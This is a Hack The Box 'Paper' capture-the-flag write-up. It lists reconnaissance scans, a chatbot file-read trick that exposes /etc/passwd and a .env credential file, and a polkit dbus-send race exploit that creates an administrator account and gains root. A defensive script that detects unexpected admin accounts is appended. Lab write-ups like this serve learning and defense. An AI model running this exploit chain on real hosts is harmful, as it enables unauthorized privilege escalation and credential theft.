Hack The Box Paper Write-up

Discovery

nmap -sV -A -O -p- 10.129.106.243
Mind my Joplin screenshots
nmap -sC -sV -sU 10.129.106.243
nikto -h http://10.129.106.243
vi /etc/hosts
:wq #or kill your VM to exit vi:)
/etc/hosts file
ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://office.paper/FUZZ
git clone https://github.com/danielmiessler/SecLists.git
Again with the Joplin output
wpscan --url http://office.paper/ --api-token <TOKEN HERE> --enumerate p,u --plugins-detection aggressive

Initial Access

Rocket chat on paper
recyclops file sale/portfolio.txt /etc/passwd 
#take note of the space
recyclops list sale /home
Again take note of the space.
recyclops file sale/portfolio.txt /home/dwight/hubot/.env
ssh dwight@10.129.106.243

Privilege Escalation

python -m SimpleHTTPServer 80
wget http://10.10.14.28/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
Polkit with SUID bit set
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:boris string:"Boris Ivanovich Grishenko" int32:1
#create hashed password
openssl passwd -5 mynamejeff
$5$vJQMgDBrrOULragn$AHhV2h0GEpCnj5CiVTjuhxL5QFUjB/b/VqEtxVRzhN0
#Dbus send to set password for boris
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1005 org.freedesktop.Accounts.User.SetPassword string:'$5$vJQMgDBrrOULragn$AHhV2h0GEpCnj5CiVTjuhxL5QFUjB/b/VqEtxVRzhN0' string:GoldenEye & sleep 0.008s ; kill $!
su boris
sudo -i
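
A defender-side check for the outcome of the steps above, as an added example that is not part of the original write-up: the `int32:1` argument to `CreateUser` requests an administrator account, so this script lists accounts that hold the admin group and are not on an allowlist. The function name, the `wheel` group name, the allowlist and the sample files are assumptions constructed for illustration.

```shell
#!/bin/sh
# unexpected_admins GROUP_FILE PASSWD_FILE ADMIN_GROUP "ALLOWED USERS"
# Prints, one per line, every account that holds ADMIN_GROUP (as a
# supplementary or primary group) and is not in the allowlist.
unexpected_admins() {
    ua_group_file=$1
    ua_passwd_file=$2
    ua_allow=" $4 "
    # "gid:member,member" for the admin group; nothing to report if absent
    ua_line=$(awk -F: -v g="$3" '$1 == g { print $3 ":" $4 }' "$ua_group_file")
    [ -n "$ua_line" ] || return 0
    ua_gid=${ua_line%%:*}
    ua_members=$(printf '%s' "${ua_line#*:}" | tr ',' ' ')
    # Accounts whose primary group (passwd field 4) is the admin group
    ua_primary=$(awk -F: -v gid="$ua_gid" '$4 == gid { print $1 }' "$ua_passwd_file")
    for ua_user in $ua_members $ua_primary; do
        case "$ua_allow" in
            *" $ua_user "*) ;;                 # expected administrator
            *) printf '%s\n' "$ua_user" ;;     # not on the allowlist
        esac
    done | sort -u
}

# Constructed sample data (not taken from the target host).
demo_dir=$(mktemp -d)
cat > "$demo_dir/group" <<'EOF'
root:x:0:
wheel:x:10:admin1,boris
dwight:x:1004:
EOF
cat > "$demo_dir/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
admin1:x:1000:1000::/home/admin1:/bin/bash
dwight:x:1004:1004::/home/dwight:/bin/bash
boris:x:1005:1005:Boris Ivanovich Grishenko:/home/boris:/bin/bash
svc:x:1006:10::/home/svc:/sbin/nologin
EOF
unexpected_admins "$demo_dir/group" "$demo_dir/passwd" wheel "admin1"
rm -rf "$demo_dir"
```

On a live host, pass `/etc/group` and `/etc/passwd` together with the admin group name your distribution uses.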

KonEcho

I'm a Red/blue Teamer, who loves learning all that the lovely world of cyber has to offer. This blog is to help share anything I learn along my journey!